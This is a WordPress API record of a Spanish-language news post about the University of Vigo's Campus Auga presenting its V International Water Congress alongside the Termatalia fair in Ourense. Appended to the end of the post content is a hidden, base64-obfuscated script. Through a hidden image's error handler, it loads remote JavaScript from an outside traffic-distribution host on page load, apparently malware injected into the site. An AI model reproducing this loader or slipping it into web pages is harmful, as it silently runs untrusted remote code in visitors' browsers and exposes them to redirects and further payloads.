{"id":8679,"date":"2024-09-11T10:46:09","date_gmt":"2024-09-11T13:46:09","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8679"},"modified":"2025-08-13T15:38:44","modified_gmt":"2025-08-13T18:38:44","slug":"termatalia-participa-en-la-presentacion-del-v-congreso-internacional-del-agua-que-organiza-el-campus-auga-de-la-universidad-de-vigo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8679","title":{"rendered":"Termatalia participa en la presentaci\u00f3n del V Congreso Internacional del Agua que organiza el Campus Auga de la Universidad de Vigo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-f305fcdf91182e7f0a350d9bc8c5da8c\" style=\"background-color:#056aa4\"><strong><em>Se celebrar\u00e1 en Ourense entre el 25 y el 27 de septiembre de forma paralela y complementarias a las actividades de la feria Internacional de Turismo Termal, Salud y Bienestar<\/em><\/strong><\/h4>\n\n\n\n<p>El Campus Auga de la Universidad de Vigo, socio estrat\u00e9gico de Termatalia en lo relativo a la formaci\u00f3n especializada alrededor del agua termal, present\u00f3 esta ma\u00f1ana su V Congreso Internacional sobre el Agua que lleva por t\u00edtulo \u201cEl agua como recurso sostenible: ciencia, empresa y bienestar\u201d. Este congreso se celebrar\u00e1 entre el 25 y el 27 de septiembre de forma paralela y complementaria a la propia Termatalia convirtiendo a Ourense en el epicentro del conocimiento sobre el agua termal. El objetivo de este congreso es ofrecer un punto de encuentro para reflexionar e intercambiar conocimientos sobre aspectos significativos relacionados con el agua, dedicando especial atenci\u00f3n a la gesti\u00f3n empresarial y tur\u00edstica de recursos h\u00eddricos como las aguas termales.<\/p>\n\n\n\n<p>La iniciativa se enmarca en las actuaciones del Campus Auga, el proyecto de especializaci\u00f3n del campus de Ourense acreditado por la Xunta de Galicia. Cada edici\u00f3n, la organizaci\u00f3n del congreso rota entre las diferentes facultades y escuelas de este campus. As\u00ed, en esta ocasi\u00f3n est\u00e1 organizado por la Facultad de Ciencias Empresariales y Turismo, adem\u00e1s del Vicerrectorado del Campus de Ourense, y cuenta con la colaboraci\u00f3n de Expourense \/entidad organizadora de Termatalia) y el apoyo de la Xunta de Galicia y la Diputaci\u00f3n Provincial de Ourense. El programa se llevar\u00e1 a cabo los d\u00edas 26 y 27 en dicha facultad. Previamente, el d\u00eda 25 por la tarde, los participantes se sumar\u00e1n a la celebraci\u00f3n de la feria Termatalia en Expourense.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/CVCIA.jpg-congreso-1.jpg\"><img decoding=\"async\" width=\"800\" height=\"450\" data-id=\"8682\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/CVCIA.jpg-congreso-1.jpg\" alt=\"\" class=\"wp-image-8682\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/CVCIA.jpg-congreso-1.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/CVCIA.jpg-congreso-1-300x169.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/CVCIA.jpg-congreso-1-768x432.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/CVCIA.jpg-congreso-1-696x392.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/CVCIA.jpg-congreso-1-747x420.jpg 747w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/CVCIA.jpg-congreso-1-320x180.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/CVCIA.jpg-congreso-1-480x270.jpg 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1.jpeg\"><img decoding=\"async\" width=\"1024\" height=\"679\" data-id=\"8680\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1-1024x679.jpeg\" alt=\"\" class=\"wp-image-8680\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1-1024x679.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1-300x199.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1-768x510.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1-696x462.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1-1068x709.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1-633x420.jpeg 633w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1-320x212.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1-480x318.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1-800x531.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/09\/congreso_auga3-1536x1019-1.jpeg 1536w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>En el acto de presentaci\u00f3n, Francisco Javier Rodr\u00edguez, rector del campus de Ourense, record\u00f3 que la acreditaci\u00f3n del Campus del Agua trajo consigo financiaci\u00f3n para actividades como este congreso. Este evento destac\u00f3 que permite \u201cdar visibilidad al Campus del Agua\u201d y profundizar en temas estrat\u00e9gicos para \u00e9l y para la provincia como la gesti\u00f3n t\u00e9rmica. Por su parte, Rogelio Mart\u00ednez, director general de Expourense, destac\u00f3 que este congreso ejemplifica la cooperaci\u00f3n existente entre Expourense y la Universidad de Vigo, explicando que \u201cdesde hace varios a\u00f1os el Campus del Agua es un socio estrat\u00e9gico de Termatalia, intentando colaborar en cada edici\u00f3n sin importar d\u00f3nde se celebre la feria\u201d, afirm\u00f3.<\/p>\n\n\n\n<p>Montserrat Cruz, decana de la Facultad de Ciencias Empresariales y Turismo y presidenta del comit\u00e9 organizador del congreso, fue la encargada de detallar las caracter\u00edsticas del evento, agradeciendo la colaboraci\u00f3n de las entidades implicadas. El congreso tiene un car\u00e1cter multidisciplinar, abordando aspectos espec\u00edficos relacionados con la tem\u00e1tica del agua, como su gesti\u00f3n en las empresas y el turismo, el patrimonio acu\u00e1tico, el turismo deportivo y el turismo termal.<\/p>\n\n\n\n<p>Enlace a la web de este congreso:\u00a0<a href=\"https:\/\/congresodaauga.webs.uvigo.es\/\">https:\/\/congresodaauga.webs.uvigo.es\/<\/a><\/p>\n<p>\u00a0<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se celebrar\u00e1 en Ourense entre el 25 y el 27 de septiembre de forma paralela y complementarias a las actividades de la feria Internacional de Turismo Termal, Salud y Bienestar El Campus Auga de la Universidad de Vigo, socio estrat\u00e9gico de Termatalia en lo relativo a la formaci\u00f3n especializada alrededor del agua termal, present\u00f3 esta [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-8679","post","type-post","status-publish","format-standard","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8679","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8679"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8679\/revisions"}],"predecessor-version":[{"id":10085,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8679\/revisions\/10085"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8679"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8679"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8679"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}